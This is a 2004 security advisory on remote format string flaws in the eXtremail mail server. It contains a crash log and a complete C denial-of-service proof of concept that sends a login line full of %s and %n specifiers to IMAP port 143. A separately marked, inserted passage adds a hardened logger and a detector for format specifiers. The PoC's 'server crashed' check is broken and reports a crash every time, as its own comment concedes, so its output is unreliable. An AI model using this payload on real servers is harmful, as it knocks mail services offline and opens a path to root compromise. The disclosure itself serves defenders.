Remote Format String Vulnerabilities in eXtremail

2004-04-27T00:00:00
ID SECURITYVULNS:DOC:6138
Type securityvulns
Reporter Securityvulns
Modified 2004-04-27T00:00:00

Description

Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String

What’s eXtremail:

eXtremail is a Unix mail server that supports the SMTP, POP3 and IMAP protocols. It includes support for virtual domains, spoofing attack, SSL connection and antivirus checking.

Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail, allowing remote attackers to gain root privileges. The flaw can be exploited by supplying a specially crafted string containing format specifiers to various SMTP, POP and IMAP commands. The vulnerability was reported to affect some previous versions (BugTraq ID: 2908) and has been reintroduced in the latest version of eXtremail.

Here is a snippet of eXtremail's log:

    25/04/2004 - 16:26:29 -> ----------------------------------------------
    25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection -
    25/04/2004 - 16:26:29 -> ----------------------------------------------
    25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
    25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
    25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received

After a successful denial-of-service attack, eXtremail must be restarted to regain its functionality (Smtpd, Pop3d, Imapd, Remt).
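The bug class behind the "IMAP - Error: User" log line, as an added C example that is not eXtremail's code and not part of the original advisory: a logger that keeps client text out of the format argument, plus a check that counts conversion specifiers in untrusted input. The names log_line, log_login_error and count_format_specs are hypothetical, and the sample input is constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical printf-style logger standing in for the daemon's log routine.
 * The format attribute lets gcc/clang -Wformat-security flag non-literal formats. */
static int log_line(char *out, size_t len, const char *fmt, ...)
    __attribute__((format(printf, 3, 4)));

static int log_line(char *out, size_t len, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, len, fmt, ap);
    va_end(ap);
    return n;
}

/* Vulnerable pattern (shown only, never called here):
 *     log_line(out, len, user);    <- client text is parsed as the format
 * Hardened form: constant format, client text passed purely as data. */
int log_login_error(char *out, size_t len, const char *user)
{
    return log_line(out, len, "IMAP - Error: User %s", user);
}

/* Count printf conversions in untrusted input so a front end can alert on
 * or reject it before it reaches any logger. "%%" is a literal percent. */
int count_format_specs(const char *s)
{
    int n = 0;
    while (*s) {
        if (*s++ != '%') continue;
        if (*s == '%') { s++; continue; }
        s += strspn(s, "0123456789.-+ #*$hlLqjzt");   /* flags, width, length */
        if (*s && strchr("diouxXeEfgGaAcspn", *s)) { n++; s++; }
    }
    return n;
}

int main(void)
{
    char out[128];
    const char *user = "%s%s%n";   /* constructed sample input */
    log_login_error(out, sizeof out, user);
    printf("%s (specifiers in input: %d)\n", out, count_format_specs(user));
    return 0;
}
```

With the constant format string, the specifiers in the login name are written to the log as literal characters instead of being interpreted.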

Proof of Concept:

------ eXtremail-kill.c --------

    /*******
     * Proof of Concept
     * eXtremail 1.5.x Denial of Service
     *
     * Luca Ercoli <luca.e [at] seeweb.com>
     * Seeweb http://www.seeweb.com
     *
     *********/

    #include <stdio.h>
    #include <stdlib.h>     /* exit */
    #include <string.h>     /* strlen, memset */
    #include <unistd.h>     /* close, sleep, fork */
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    #define PORT 143
    #define MAXRECVSIZE 100

    int main(int argc, char *argv[]);
    void crash(char *host, int TYPE);

    int numbytes;

    /* TYPE 0: read the banner, then send the login line below.
     * TYPE 1: only connect and read the banner (status check). */
    void crash(char *host, int TYPE)
    {
        int sockfd;
        char buf[MAXRECVSIZE];
        struct hostent *he;
        struct sockaddr_in their_addr;
        char poc[] = "1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";

        if ((he = gethostbyname(host)) == NULL) {
            perror("gethostbyname");
            exit(1);
        }

        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            perror("socket");
            exit(1);
        }

        their_addr.sin_family = AF_INET;
        their_addr.sin_port = htons(PORT);
        their_addr.sin_addr = *((struct in_addr *)he->h_addr);
        memset(&(their_addr.sin_zero), '\0', 8);

        if (connect(sockfd, (struct sockaddr *)&their_addr,
                    sizeof(struct sockaddr)) == -1) {
            perror("connect");
            exit(1);
        }

        /* Read the server banner */
        if ((numbytes = recv(sockfd, buf, MAXRECVSIZE - 1, 0)) == -1) {
            perror("recv");
            exit(1);
        }

        buf[numbytes] = '\0';

        if (TYPE == 0) {
            printf("[+] Server -> %s", buf);
            sleep(1);
            printf("\n[!] Sending malicious packet...\n");

            send(sockfd, poc, strlen(poc), 0);
            sleep(1);
            printf("\n[+] Sent!\n");
        }

        close(sockfd);
    }

    int main(int argc, char *argv[])
    {
        printf("\n\n eXtremail 1.5.x Denial of Service \n");
        printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");

        if (argc != 2) {
            fprintf(stderr, "\nUsage -> %s hostname\n\n", argv[0]);
            exit(1);
        }

        crash(argv[1], 0);
        numbytes = 0;
        printf("\n[+] Checking server status ...\n");

        /* The banner read happens in the forked child, so the parent's
         * numbytes is still 0 here whatever the server's state. */
        if (!fork())
            crash(argv[1], 1);
        sleep(5);
        if (numbytes == 0)
            printf("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

        return 0;
    }


Solution: No solution available at the moment.

Credits:

-- Luca Ercoli <luca.e [at] seeweb.com> Seeweb http://www.seeweb.com